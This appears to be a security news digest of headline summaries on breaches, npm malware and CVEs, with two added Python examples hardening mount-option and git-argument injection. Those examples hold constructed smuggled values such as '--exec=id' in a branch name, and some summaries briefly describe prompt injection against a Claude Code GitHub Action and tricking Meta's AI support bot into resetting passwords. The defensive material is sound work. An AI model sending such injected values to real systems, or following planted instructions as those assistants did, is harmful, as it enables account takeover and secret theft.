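The injection in CVE-2026-6437 works because mount takes its options as a single comma-separated string, so any identifier concatenated into that string without validation can carry extra options with it. The added example below is illustrative code written for this page, not the EFS CSI driver's code. It builds the option string the way a driver might, first without validation and then with a strict shape check on every value that reaches the string. The `fsid:subpath:accesspointid` layout of volumeHandle, the `fs-`/`fsap-` identifier shapes and the `mounttargetip` attribute name are assumptions based on the bulletin text and typical EFS naming; the inputs are constructed and the injected option name is a placeholder.

```python
import ipaddress
import re

# Assumed identifier shapes for the illustration: 'fs-' / 'fsap-' followed by hex digits.
FS_ID_RE = re.compile(r"^fs-[0-9a-f]{8,17}$")
AP_ID_RE = re.compile(r"^fsap-[0-9a-f]{8,17}$")


def split_volume_handle(volume_handle: str) -> tuple[str, str, str]:
    """Assumed layout 'fsid:subpath:accesspointid'; missing trailing parts are empty."""
    parts = volume_handle.split(":")
    if len(parts) > 3:
        raise ValueError("too many fields in volumeHandle")
    parts += [""] * (3 - len(parts))
    return parts[0], parts[1], parts[2]


def mount_options_unchecked(volume_handle: str, attrs: dict) -> str:
    """Vulnerable pattern: identifiers are dropped into the -o string exactly as supplied."""
    _, _, ap_id = split_volume_handle(volume_handle)
    opts = ["tls"]
    if ap_id:
        opts.append(f"accesspoint={ap_id}")
    if "mounttargetip" in attrs:
        opts.append(f"mounttargetip={attrs['mounttargetip']}")
    return ",".join(opts)


def mount_options_checked(volume_handle: str, attrs: dict) -> str:
    """Hardened: every value that lands in the option string must match a strict shape,
    which rules out the comma that the injection depends on."""
    fs_id, _, ap_id = split_volume_handle(volume_handle)
    if not FS_ID_RE.fullmatch(fs_id):
        raise ValueError(f"bad file system id {fs_id!r}")
    opts = ["tls"]
    if ap_id:
        if not AP_ID_RE.fullmatch(ap_id):
            raise ValueError(f"bad access point id {ap_id!r}")
        opts.append(f"accesspoint={ap_id}")
    if "mounttargetip" in attrs:
        ip = ipaddress.ip_address(attrs["mounttargetip"])  # ValueError on anything but a bare address
        opts.append(f"mounttargetip={ip}")
    return ",".join(opts)


def as_mount_sees_it(option_string: str) -> list:
    """mount(8) splits -o on commas; this is the list the mount helper actually receives."""
    return option_string.split(",")


def checked_rejects(volume_handle: str, attrs: dict) -> bool:
    try:
        mount_options_checked(volume_handle, attrs)
    except ValueError:
        return True
    return False


# Constructed inputs
CLEAN_HANDLE = "fs-0123456789abcdef::fsap-0123456789abcdef"
INJECTED_HANDLE = "fs-0123456789abcdef::fsap-0123456789abcdef,injected=1"
INJECTED_ATTRS = {"mounttargetip": "10.0.0.5,injected=1"}

if __name__ == "__main__":
    print("unchecked, injected handle:", as_mount_sees_it(mount_options_unchecked(INJECTED_HANDLE, {})))
    print("unchecked, injected attrs:", as_mount_sees_it(mount_options_unchecked(CLEAN_HANDLE, INJECTED_ATTRS)))
    print("checked rejects handle:", checked_rejects(INJECTED_HANDLE, {}))
    print("checked rejects attrs:", checked_rejects(CLEAN_HANDLE, INJECTED_ATTRS))
```

Allow-listing the shape of each identifier is preferable to stripping commas: an identifier that does not look like an access point ID has no business reaching mount at all, whatever characters it contains.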

CVE-2026-1386 - Arbitrary Host File Overwrite via Symlink in Firecracker Jailer
Bulletin ID: 2026-003-AWS Scope: AWS Content Type: Important (requires attention) Publication Date: 2026/01/23 12:30 PM PST Description: Firecracker is an open source virtualization technology that is purpose-built for creating and managing secure, multi-tenant container and function-based services. Firecracker runs in user space and uses the Linux Kernel-based Virtual Machine (KVM) to create microVMs. Each Firecracker microVM is further isolated with common Linux user-space security barriers by a companion program called "jailer". The jailer provides a second line of defense in case a user escapes from the microVM boundaries and it is released at each Firecracker version. We are aware of CVE-2026-1386, an issue that is related to the Firecracker jailer, which under certain circumstances...
https://aws.amazon.com/security/security-bulletins/rss/2026-003-aws/

Weekly Metasploit Update: Apache ActiveMQ RCE, Gogs Rebase RCE, and Windows Kernel Pointer Enum
When Open Source is a bit too Open. Several fun modules landed this week, including an Apache RCE, Windows kernel pointer collection, and Gogs RCE via naming. Leading off is Gogs' RCE, which allows an attacker to execute commands by naming their branch --exec <command> and requesting a rebase. Another useful post module by CharlesQuinnDev enumerates the kernel pointers leaked via the popular NtQuerySystemInformation technique. Those exposed pointers, combined with a good write primitive, make local privilege escalation easier to accomplish. Several local privilege escalations already use that technique, so exposing just that technique was a great call! New module content (3): Apache ActiveMQ RCE via Jolokia addNetworkConnector. Authors: dinosn and h00die. Type: Exploit. Pull request: #21497 contributed...
https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-05-06-2026
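
The Gogs module above is a textbook argument injection: a user-supplied branch name is handed to git as a positional argument, and a name that begins with `--` is read as an option. The added example below is illustrative code written for this page, not Gogs or Metasploit code. It shows the unchecked argv a server might build, a validator that applies git's own branch-name rules (including the refusal of a leading dash), and the hardened argv; it only builds and inspects argv lists, so it runs offline without git. `--exec=<cmd>` is the constructed payload form used to show the option class; the Rapid7 page describes the module's actual naming. `--end-of-options` is included on the assumption, noted in a comment, that the target Git is 2.24 or later, where parse-options-based commands accept it.

```python
import re

_FORBIDDEN_CHARS = re.compile(r"[ ~^:?*\[\\]")


def is_valid_branch_name(name: str) -> bool:
    """Subset of the `git check-ref-format --branch` rules.

    The leading-dash refusal is the one that stops option injection; the rest keep
    names out of git's special syntax (ranges, reflog selectors, glob characters).
    """
    if not name or name.startswith("-"):
        return False
    if name == "@" or "@{" in name or ".." in name:
        return False
    if name.endswith(".") or name.endswith(".lock"):
        return False
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        return False
    if _FORBIDDEN_CHARS.search(name):
        return False
    # Empty components reject leading/trailing/double slashes; dot-prefixed components are hidden refs.
    return all(comp and not comp.startswith(".") and not comp.endswith(".lock")
               for comp in name.split("/"))


def rebase_argv_unchecked(onto_branch: str) -> list:
    """Vulnerable pattern: the user-controlled name is a positional argument and nothing
    prevents git from parsing it as an option."""
    return ["git", "rebase", onto_branch]


def rebase_argv_checked(onto_branch: str) -> list:
    """Hardened: validate the name first, then terminate option parsing explicitly."""
    if not is_valid_branch_name(onto_branch):
        raise ValueError(f"refusing branch name {onto_branch!r}")
    # --end-of-options: assumed available (parse-options-based git commands, Git 2.24+).
    return ["git", "rebase", "--end-of-options", onto_branch]


def checked_rejects(name: str) -> bool:
    try:
        rebase_argv_checked(name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "--exec=id"  # constructed payload in the option form git rebase accepts
    print("unchecked argv:", rebase_argv_unchecked(payload))
    print("validator rejects payload:", checked_rejects(payload))
    print("checked argv:", rebase_argv_checked("feature/login"))
```

The validator is the control to rely on; `--end-of-options` is a second layer for the case where a name slips through, and it does nothing for older Git versions or for code paths that go through a shell.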

Securing CI/CD in an agentic world: Claude Code Github action case
Microsoft Threat Intelligence identified a prompt injection pathway in Claude Code GitHub Action that allowed access to workflow secrets under specific conditions. This research examines the attack chain, responsible disclosure process, Anthropic's mitigation, and guidance for securing AI-powered CI/CD workflows.
https://www.microsoft.com/en-us/security/blog/2026/06/05/securing-ci-cd-in-agentic-world-claude-code-github-action-case/

Virginia Is For Cyber
This week in cybersecurity from the editors at Cybercrime Magazine. Sausalito, Calif. – Jun. 5, 2026 – Listen to the podcast. Virginia is home to the second largest cybersecurity industry in the country, with around 88,000 cybersecurity workers, according to Cyberseek, a project supported by […]
https://cybersecurityventures.com/virginia-is-for-cyber/

BCD Travel - 396,313 breached accounts
In May 2026, the corporate travel management company BCD Travel was claimed as a victim of the ShinyHunters "pay or leak" extortion campaign. Data allegedly obtained from BCD was subsequently published publicly in early June and contained 396k unique email addresses. Other exposed data included names, addresses, phone numbers, job titles and employer names, spanning a variety of different data sets including leads, internal staff and support tickets.
https://haveibeenpwned.com/Breach/BCDTravel

CSAI Foundation Announces RiskRubric V2 as the Next Key Milestone to Secure the Agentic Control Plane
Deloitte Italy, PointGuardAI, and Tumeryk partner with CSA to evolve the reference framework for assessing the security of AI systems SEATTLE – June 8, 2026 — Cloud Security Alliance (CSA), the world's leading not-for-profit organization committed to AI, cloud, and Zero Trust cybersecurity education, today announced the upcoming launch of RiskRubric V2, the next key milestone in expanding the CSAI Foundation's capacity to deliver on its 2026 mission of Securing the Agentic Control Plan...
https://cloudsecurityalliance.org/articles/csai-foundation-announces-riskrubric-v2-as-the-next-key-milestone-to-secure-the-agentic-control-plane

Updating the taxonomy of failure modes in agentic AI systems: What a year of red teaming taught us
A surge in real-world attacks against agentic AI systems is reshaping how we think about risk. Based on 12 months of red teaming, this update introduces seven new failure modes, from supply chain compromise to goal hijacking, and the practical mitigations teams need now.
https://www.microsoft.com/en-us/security/blog/2026/06/04/updating-taxonomy-failure-modes-agentic-ai-systems-year-red-teaming-taught-us/

RiskRubric Updates: AI Risk Assessment for the Agentic Era
RiskRubric, CSA's evidence-based risk rating system for AI technologies, is getting some timely updates. These updates aim to expand AI risk assessment beyond the model layer, reduce blind spots, and address maturing threats. The upcoming updates to RiskRubric include: A multi-scanner ecosystem powered by independent partners Deloitte Italy, PointGuard, and Tumeryk. Expanded assessment coverage beyond AI models to include MCP servers and AI agents. Modernized evaluation pillars add...
https://cloudsecurityalliance.org/articles/riskrubric-updates-ai-risk-assessment-for-the-agentic-era

New Shai-Hulud Miasma Wave Hits Hundreds of npm Packages
Update, June 5, 2026: As of this date, we have identified a total of 304 components impacted by this malware, expanding on the amount noted in our initial reporting. We will continue to monitor the situation, and we remind users to consult our Sonatype Guide page. Our original blog post continues below.
https://www.sonatype.com/blog/new-shai-hulud-miasma-wave-hits-hundreds-of-npm-packages

China-Linked TA4922 Expands Phishing Attacks to U.K., Germany, Italy, and South Africa

https://www.proofpoint.com/us/newsroom/news/china-linked-ta4922-expands-phishing-attacks-uk-germany-italy-and-south-africa

Scam Compound Trafficking Victim To Cybercrime Whistleblower: Mohammad Muzahir's Story
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jun. 4, 2026 – Listen to the podcast Popular radio host Kim Komando tells Mohammad Muzahir’s Story on the Komando.com blog. Muzahir grew up in Kashmir, India, the eighth of eight children. He The post Scam Compound Trafficking Victim To Cybercrime Whistleblower: Mohammad Muzahir’s Story appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/scam-compound-trafficking-victim-to-cybercrime-whistleblower-mohammad-muzahirs-story/

Software supply chain attacks: check your dependencies
Attackers are compromising open-source packages to spread malware. Cyber defenders are asked to review their dependencies to reduce the risk.
https://www.ncsc.gov.uk/blogs/software-supply-chain-attacks-check-your-dependencies

Frontline Workers Twice as Likely to Use Unapproved AI
New research by Mitel has revealed a widening gap between AI adoption and enablement, with limited support and low confidence contributing to the rise of Shadow AI and unapproved AI usage. The State of Workforce Communication report found that while workplace communication is mission-critical, tools are misaligned with how teams execute, forcing employees to quietly […] The post Frontline Workers Twice as Likely to Use Unapproved AI appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/06/04/frontline-workers-twice-as-likely-to-use-unapproved-ai/?utm_source=rss&utm_medium=rss&utm_campaign=frontline-workers-twice-as-likely-to-use-unapproved-ai

DentaQuest - 2,553,599 breached accounts
In May 2026, the dental benefits administrator DentaQuest was the target of a ShinyHunters "pay or leak" extortion campaign that resulted in the group publicly publishing hundreds of gigabytes of data allegedly obtained from the company. The data included 2.6M unique email addresses along with names, addresses and phone numbers. Much of the data appeared in healthcare enrollment files (ASC X12 transaction sets) with some containing Medicaid IDs, while additional data appeared in member records and related files. DentaQuest acknowledged "a cybersecurity incident involving unauthorized access to a limited portion of our network", and advised they had contained the attack and mitigated the threat.
https://haveibeenpwned.com/Breach/DentaQuest

Lazarus Group's Latest: Brandjacking Campaign on npm
TL;DR Sonatype Security Research is tracking a Lazarus Group npm campaign using dozens of malicious packages to abuse developer trust and deliver follow-on payloads. The campaign goes beyond typosquatting, relying on brandjacking tactics like suffix addition, embedding, and version mimicry to make packages look ecosystem-adjacent. Analysis of buffer-utilities shows a malicious dropper that fetches and executes remote payloads, setting the stage for ongoing attacker-controlled intrusions. Organizations that installed affected packages should remove them, investigate for second-stage activity, and treat impacted systems as potentially compromised. Sonatype is tracking a Lazarus Group campaign on npm, consisting of dozens of packages, some with up to 500 weekly downloads,...
https://www.sonatype.com/blog/lazarus-groups-latest-brandjacking-campaign-on-npm

Ransom & Dark Web Issues Week 1, June 2026
ASEC Blog publishes Ransom & Dark Web Issues Week 1, June 2026: Qilin Ransomware Attack Targets South Korean Automation Equipment Company; New Data Extortion Group Black X Claims Leak of Internal Data from South Korean Plastic Surgery Clinic; Nova Ransomware Attack Targets Department of AI at University in Daegu, South […]
https://asec.ahnlab.com/en/93989/

5 Steps to Turn Your RMF Backlog Into a Continuous ATO: The CSRMC Migration Playbook
Let's be honest about the legacy Risk Management Framework (RMF): for the last decade, achieving an ATO has been less about actual cybersecurity and more about creative writing. We built three-year "snapshot" PDFs, crossed our fingers, and hoped the underlying code didn't rot before the next audit.
https://www.sonatype.com/blog/5-steps-to-turn-your-rmf-backlog-into-a-continuous-ato-the-csrmc-migration-playbook

500 Ransomware Statistics For 2026
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jun. 3, 2026 – Read the full story from Bright Defense Ransomware has existed for more than 35 years and remains the fastest-growing category of cybercrime, showing no signs of slowing down, according The post 500 Ransomware Statistics For 2026 appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/500-ransomware-statistics-for-2026/

ComoDoS - Exploiting a Remote Kernel Vulnerability in Comodo Internet Security
Sometimes the firewall stops attackers, sometimes attackers stop the firewall. Analyzing a zero-day vulnerability in Comodo Internet Security's firewall driver.
https://malwaretech.com/2026/06/exploiting-a-remote-kernel-vulnerability-in-comodo-internet-security.html

Argamal: Malware hidden in hentai games
Kaspersky researchers analyze new Argamal RAT distributed via infected hentai games and allowing the attacker to control the target machine.
https://securelist.com/argamal-rat-distributed-with-hentai-games/119999/

Lessons for life: Why children's data is a long-term identity risk
Your child's first data breach may happen before they've even opened a bank account. Here's how to keep their digital life safe.
https://www.welivesecurity.com/en/kids-online/lessons-life-childrens-data-long-term-identity-risk/

Linux Kernel vulnerability Dirty Frag
CVSSv3 Score: 7.9. The Linux kernel is impacted by CVE-2026-43284 and CVE-2026-43500, which chained together create the Dirty Frag vulnerability.
CVE-2026-43284: In the Linux kernel, the following vulnerability has been resolved: xfrm: esp: avoid in-place decrypt on shared skb frags. MSG_SPLICE_PAGES can attach pages from a pipe directly to an skb. TCP marks such skbs with SKBFL_SHARED_FRAG after skb_splice_from_iter(), so later paths that may modify packet data can first make a private copy. The IPv4/IPv6 datagram append paths did not set this flag when splicing pages into UDP skbs. That leaves an ESP-in-UDP packet made from shared pipe pages looking like an ordinary uncloned nonlinear skb. ESP input then takes the no-COW fast path for uncloned skbs without a frag_list and decrypts in place...
https://fortiguard.fortinet.com/psirt/FG-IR-26-144

Preinstall to persistence: Inside the Red Hat npm Miasma credential-stealing campaign
A large-scale npm supply chain attack compromised over 90 versions of @redhat-cloud-services packages, silently infecting CI/CD environments and developer systems. The malicious code steals credentials from GitHub, cloud platforms, and local machines, then spreads like a worm by republishing trusted packages. Discover how the attack works, what data is at risk, and the steps you can take to protect your organization. The post Preinstall to persistence: Inside the Red Hat npm Miasma credential-stealing campaign appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2026/06/02/preinstall-persistence-inside-red-hat-npm-miasma-credential-stealing-campaign/

The AI Race Is Becoming a Remediation Race
If AI is going to change how we find vulnerabilities, then policy has to address the full cycle of repair.
https://www.sonatype.com/blog/the-ai-race-is-becoming-a-remediation-race

The npm Threat Landscape: Attack Surface and Mitigations (Updated June 2)
Unit 42 analyzes npm supply chain evolution post-Shai Hulud. Discover wormable malware, CI/CD persistence, multi-stage attacks and more. The post The npm Threat Landscape: Attack Surface and Mitigations (Updated June 2) appeared first on Unit 42.
https://unit42.paloaltonetworks.com/monitoring-npm-supply-chain-attacks/

Microsoft Build 2026: Securing code, agents, and models across the development lifecycle
Discover how Microsoft enables fast, secure AI development with MDASH and new security capabilities. The post Microsoft Build 2026: Securing code, agents, and models across the development lifecycle appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2026/06/02/microsoft-build-2026-securing-code-agents-and-models-across-the-development-lifecycle/

ESPN Journalist Dan Wetzel On Matt Weiss Hacking Allegations
This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Jun. 2, 2026 – Listen to the podcast In Dec. 2025, ESPN reported that former University of Michigan co-offensive coordinator and quarterbacks coach Matt Weiss, 42, was indicted in Mar. 2025 for allegedly stealing private videos The post ESPN Journalist Dan Wetzel On Matt Weiss Hacking Allegations appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/espn-journalist-dan-wetzel-on-matt-weiss-hacking-allegations/

Wardriving assessment across Mexico: Preparing for the 2026 World Cup
In the lead-up to the 2026 FIFA World Cup, Kaspersky GReAT experts conducted a wardriving assessment in Mexico City, Monterrey, and Guadalajara to evaluate Wi-Fi hotspot security configurations and potential exposure risks.
https://securelist.com/wardriving-assessment-in-mexico-fifa-world-cup-2026/119996/

Operation FlutterBridge: macOS Malvertising Campaign Spreads New FlutterShell Backdoor
Operation FlutterBridge is a malvertising campaign targeting macOS users. It distributed the new backdoor FlutterShell, built using the Flutter framework. The post Operation FlutterBridge: macOS Malvertising Campaign Spreads New FlutterShell Backdoor appeared first on Unit 42.
https://unit42.paloaltonetworks.com/flutterbridge-new-fluttershell-backdoor/

Over 80% of Organizations that Miss 24-Hour Patch Window Report Security Incidents Involving Known Vulnerabilities
Survey of 900+ security leaders shows runtime is the breach battlefield. Even pre-production controls are not stopping known vulnerabilities in the AI age, as 82% of organizations lack real-time visibility into AI runtime behavior. NEW YORK, June 2, 2026 – The Cloud Security Alliance (CSA), the world's leading not-for-profit organization committed to AI, cloud, and Zero Trust cybersecurity education, has released the 2026 State of Modern Application & AI Security Report. ...
https://cloudsecurityalliance.org/articles/over-80-of-organizations-that-miss-24-hour-patch-window-report-security-incidents-involving-known-vulnerabilities

Inside APAC's malvertising ecosystem: How scams spread through social media ads
Bitdefender Labs has uncovered a large-scale malvertising ecosystem operating across APAC, where scam campaigns are distributed through paid advertising on Meta platforms and quickly generate massive reach. Key takeaways:
* Bitdefender Labs identified 12,000 scam campaigns across 13 APAC countries
* These campaigns generated more than 400,000 ad sightings through paid ads on Meta platforms
* Health and finance are the leading scam categories, together accounting for 37.3% of all campaigns
https://www.bitdefender.com/en-us/blog/labs/inside-the-apac-malvertising-ecosystem

Red Hat Cloud Services npm Packages Hijacked
A new wave of malicious npm activity has been reported involving multiple packages in the legitimate @redhat-cloud-services namespace.
https://www.sonatype.com/blog/red-hat-cloud-services-npm-packages-hijacked

Hackers Used Meta's AI Support Bot to Seize Instagram Accounts
The Instagram accounts for the Obama White House and the Chief Master Sergeant of the U.S. Space Force were briefly defaced with pro-Iranian images and messages over the weekend, after instructions began circulating on Telegram showing how to trick Meta's "AI support assistant" bot into resetting account passwords.
https://krebsonsecurity.com/2026/06/hackers-used-metas-ai-support-bot-to-seize-instagram-accounts/

IT Security Guru picks for Infosecurity Europe 2026
With Infosecurity Europe kicking off tomorrow, many of us will be fine tuning our schedules and prepping for the festivities to kick off. The Gurus have been busy collecting a selection of unmissable events to help you plan your trip and ensure you get the most out of your visit.  Here's a selection of ones […] The post IT Security Guru picks for Infosecurity Europe 2026 appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/06/01/it-security-guru-picks-for-infosecurity-europe-2026/?utm_source=rss&utm_medium=rss&utm_campaign=it-security-guru-picks-for-infosecurity-europe-2026

Building a Digital Fortress: Why Cyber Security Matters More Than Ever
As a society, our reliance on technology has never been greater. From banking and shopping to remote work and healthcare, we have access to information in an instant. As good as technology is at helping us with daily tasks, it also comes with risks. Cybersecurity is no longer a concern for IT departments in a […] The post Building a Digital Fortress: Why Cyber Security Matters More Than Ever appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/06/01/building-digital-fortress-why-cyber-security-matters-more-ever/?utm_source=rss&utm_medium=rss&utm_campaign=building-digital-fortress-why-cyber-security-matters-more-ever

Nine in Ten Security Leaders Concerned About AI-Generated Code Risks as Salt Security Launches New Governance Tool
The rapid adoption of AI coding assistants is creating a new governance challenge for enterprise security teams, according to research released by Salt Security, which found that nine in ten security leaders are concerned about the security risks associated with AI-generated code. The research, AI Coding Assistants and the New Security Challenge, surveyed 100 IT […] The post Nine in Ten Security Leaders Concerned About AI-Generated Code Risks as Salt Security Launches New Governance Tool appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/06/01/nine-in-ten-security-leaders-concerned-about-ai-generated-code-risks-as-salt-security-launches-new-governance-tool/?utm_source=rss&utm_medium=rss&utm_campaign=nine-in-ten-security-leaders-concerned-about-ai-generated-code-risks-as-salt-security-launches-new-governance-tool

Containers on fire: from container escapes to supply chain attacks
We break down the primary attack vectors in containerized environments: exposed secrets, privilege misconfigurations, API compromise, and supply chain attacks.
https://securelist.com/container-attack-vectors/120010/

Edmunds - 177,860 breached accounts
In January 2026, the automotive research and car-shopping platform Edmunds was listed by the ShinyHunters hacking group as having been breached. Data purportedly obtained in the incident was later published publicly and included 178k unique email addresses, usernames, passwords, IP addresses, phone numbers and vehicle-related records.
https://haveibeenpwned.com/Breach/Edmunds

AI Powered Nmap using ShellGPT
Overview This article examines how pairing ShellGPT — an AI-powered command-line assistant driven by the OpenAI API — with Nmap fundamentally changes the pace and The post AI Powered Nmap using ShellGPT appeared first on Hacking Articles.
https://www.hackingarticles.in/ai-powered-nmap-using-shellgpt/

Atlas Menu - 63,926 breached accounts
In May 2026, the GTA V and CS2 cheat service Atlas Menu suffered a data breach. An attacker claimed to have gained access to all Atlas systems and published the service's database to a public GitHub repository. The incident exposed 64k unique email addresses along with usernames, IP addresses, support tickets and passwords stored as bcrypt hashes.
https://haveibeenpwned.com/Breach/AtlasMenu

Malicious npm packages abuse dependency confusion to profile developer environments
A dependency confusion campaign leveraged 33 malicious npm packages to collect reconnaissance data from developer and build environments. This report details the attack chain, observed tradecraft, and detection opportunities to help organizations identify and disrupt related activity. The post Malicious npm packages abuse dependency confusion to profile developer environments appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2026/05/29/33-malicious-npm-packages-abuse-dependency-confusion-profile-developer-environments/

Microsoft is named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection
Microsoft is named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. The post Microsoft is named a Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2026/05/29/microsoft-is-named-a-leader-in-the-2026-gartner-magic-quadrant-for-endpoint-protection/

Acumen Cyber and AttackIQ Partner to Strengthen Cyber Defense Validation
Acumen Cyber has announced a strategic partnership with AttackIQ to help organizations continuously validate their cyber defenses against real-world threats and reduce exposure to modern attacks. The partnership combines Acumen Cyber's engineering-led security operations expertise with AttackIQ's Continuous Threat Exposure Management (CTEM) platform. Together, the companies aim to help organizations identify exploitable attack paths, validate […] The post Acumen Cyber and AttackIQ Partner to Strengthen Cyber Defense Validation appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/05/29/acumen-cyber-attackiq-cyber-resilience-partnership/?utm_source=rss&utm_medium=rss&utm_campaign=acumen-cyber-attackiq-cyber-resilience-partnership

This month in security with Tony Anscombe – May 2026 edition
In this roundup, Tony looks at attacks against Polish water treatment facilities, how AI-directed attacks failed in Mexico, and what Google believes is the first AI-generated zero-day exploit
https://www.welivesecurity.com/en/videos/month-security-tony-anscombe-may-2026/

What's in the container? Analyzing vulnerabilities, risks and protection with Kaspersky Container Security and the KIRA AI assistant
What are the main risks for container environments: vulnerabilities, supply chain attacks, configuration errors; how to improve container security and how Kaspersky Container Security with the KIRA AI assistant can help.
https://securelist.com/container-security-typical-issues/119974/

Charter - 4,851,517 breached accounts
In May 2026, the telecommunications company Charter Communications (the parent company behind the consumer broadband and cable brand Spectrum) was named by the ShinyHunters group in a "pay or leak" extortion campaign. The group later published the data, which exposed 4.9M unique email addresses along with names, phone numbers and physical addresses. A subset of approximately 85k records originating from an internal employee directory also included job titles. Charter confirmed the incident, but stated that no sensitive personal information or customer proprietary network information (CPNI) was exfiltrated.
https://haveibeenpwned.com/Breach/Charter

Designing Agentic AI Systems with the ORCHIDEAS Framework
A secure-by-construction approach to nine-pillar agentic AI design, integrated with the Cloud Security Alliance MAESTRO threat modeling framework. Introduction: Security as a Structural Property. Most security failures in software systems come from treating security as something added on top of an otherwise-complete design. A team builds the application, then adds authentication; ships the feature, then writes the audit log; designs the architecture, then performs a penetration ...
https://cloudsecurityalliance.org/articles/designing-agentic-ai-systems-with-the-orchideas-framework

Inside a 176-Package npm Campaign Built to Beat Your Internal Dependencies
The latest malware campaign uncovered by Sonatype researchers involved 176 malicious npm packages, many published with the exact same version number: 99.99.99.
https://www.sonatype.com/blog/inside-a-176-package-npm-campaign-built-to-beat-your-internal-dependencies

Check Point Launches AI Agents That Think Like Attackers as Autonomous Exploitation Reaches Critical Threat Level
Check Point Software has launched Agentic Exposure Validation (AEV), a new AI-driven capability within its Exposure Management platform that uses autonomous agents to reason like attackers and provide security teams with hard evidence of what is genuinely exploitable in their environment, before adversaries can act on it. The launch comes as the threat landscape undergoes […] The post Check Point Launches AI Agents That Think Like Attackers as Autonomous Exploitation Reaches Critical Threat Level appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/05/28/check-point-launches-ai-agents-that-think-like-attackers-as-autonomous-exploitation-reaches-critical-threat-level/?utm_source=rss&utm_medium=rss&utm_campaign=check-point-launches-ai-agents-that-think-like-attackers-as-autonomous-exploitation-reaches-critical-threat-level

Proton Mail Lets Users Send and Receive Gmail Directly Without Giving Google Access to Proton Inbox
Swiss privacy company Proton has rolled out a significant update to Proton Mail that allows users to connect their Gmail accounts directly to the platform. The feature, announced on 28 May 2026, enables Gmail messages to be imported into Proton Mail and allows users to send and receive emails from their Gmail address, all without […] The post Proton Mail Lets Users Send and Receive Gmail Directly Without Giving Google Access to Proton Inbox appeared first on IT Security Guru.
https://www.itsecurityguru.org/2026/05/28/proton-mail-lets-users-send-and-receive-gmail-directly-without-giving-google-access-to-proton-inbox/?utm_source=rss&utm_medium=rss&utm_campaign=proton-mail-lets-users-send-and-receive-gmail-directly-without-giving-google-access-to-proton-inbox

2026 World Cup: Discussing The World's Biggest Game's Attack Surface
The 2026 World Cup presents major cyber risks from ransomware groups, state-aligned actors, and other groups targeting critical infrastructure. Learn more here. The post 2026 World Cup: Discussing The World's Biggest Game's Attack Surface appeared first on Unit 42.
https://unit42.paloaltonetworks.com/fifa-world-cup-attack-surface/

ESET APT Activity Report Q4 2025–Q1 2026
An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q4 2025 and Q1 2026
https://www.welivesecurity.com/en/eset-research/eset-apt-activity-report-q4-2025-q1-2026/

Kemper - 269,299 breached accounts
In April 2026, the American insurance holding company Kemper Corporation was named by the ShinyHunters ransomware group in a "pay or leak" extortion campaign. The attackers allegedly accessed Kemper's Salesforce environment via social engineering as part of a broader campaign targeting hundreds of organisations using the same method. The group later published tens of gigabytes of data they claimed included internal directory data, Salesforce records and Stripe payment logs. Among the 269k unique email addresses were names, phone numbers, physical addresses and partial payment card data including the last 4 digits, expiry dates and card brands. Kemper confirmed the incident and stated they had engaged third-party cybersecurity experts and notified law enforcement.
https://haveibeenpwned.com/Breach/Kemper

Pirates in the crosshairs: how one cybercrime gang has been infecting book, movie, and TV show fans for years
Our experts continue to track attacks targeting consumers of pirated content, both books and movies. 2026 saw the discovery of new target sites with tens of millions of visitors, while the miner gained a RAT module.
https://securelist.com/video-books-pirates-miners-rat/119943/

Top 6 Claude Security Risks to Watch as AI Becomes Your Employees' Operating System
Originally published by Akto. If there's one product that has quietly embedded itself into how your employees actually work, it's Claude. Two years ago, it was summarizing meetings. Today, it's reading local files, running shell commands, browsing the web with employee session cookies, and connecting to your Slack, GitHub, and production databases. What started as a productivity shortcut now operates with the same privileges as the person using it, and in many organizations, s...
https://cloudsecurityalliance.org/articles/top-6-claude-security-risks-to-watch-as-ai-becomes-your-employees-operating-system

Top Cloud Cost Optimization Techniques in 2026 for Maximum ROI
As cloud adoption continues to accelerate, organizations are spending more than ever on infrastructure, storage, and services. In 2026, businesses are projected to invest over trillion in cloud computing, yet studies suggest that up to 35% of this spend is wasted due to over-provisioning, idle resources, and inefficient practices. The challenge is clear: how can organizations maximize value from their cloud investments while controlling costs? With the right approach, from dynamicall...
https://cloudsecurityalliance.org/articles/top-cloud-cost-optimization-techniques-in-2026-for-maximum-roi

The HIPAA Security Rule Is About to Change: What Healthcare CISOs Need to Do Before the Final Rule Drops
For the first time in more than twenty years, the HIPAA Security Rule is getting a serious overhaul. On December 27, 2024, the U.S. Department of Health & Human Services (HHS) Office for Civil Rights (OCR) issued a Notice of Proposed Rulemaking that would fundamentally reshape how covered entities and business associates are expected to secure electronic protected health information. The public comment period closed in March 2025, and OCR received more than 4,700 comments. Here's the...
https://cloudsecurityalliance.org/articles/the-hipaa-security-rule-is-about-to-change-what-healthcare-cisos-need-to-do-before-the-final-rule-drops

Your Security Tools Are the Target Now: Why Detection-First Architectures Are Failing Against AI-Driven and Zero-Day Exploits
Your endpoint detection tooling can no longer be your last line of defense. For attackers, it is the first thing they target and impact. ESET researchers catalogued nearly 90 EDR killers actively used in ransomware intrusions right now. The attack sequence is consistent: get in, blind or bypass the security tool, then run the encryptor. Detection never fires because it can no longer see what is happening. Two Linux kernel vulnerabilities disclosed this month show exactly how attackers g...
https://cloudsecurityalliance.org/articles/your-security-tools-are-the-target-now-why-detection-first-architectures-are-failing-against-ai-driven-and-zero-day-exploits

Out of the Crypt: The Evolving Cyber Extortion Economy
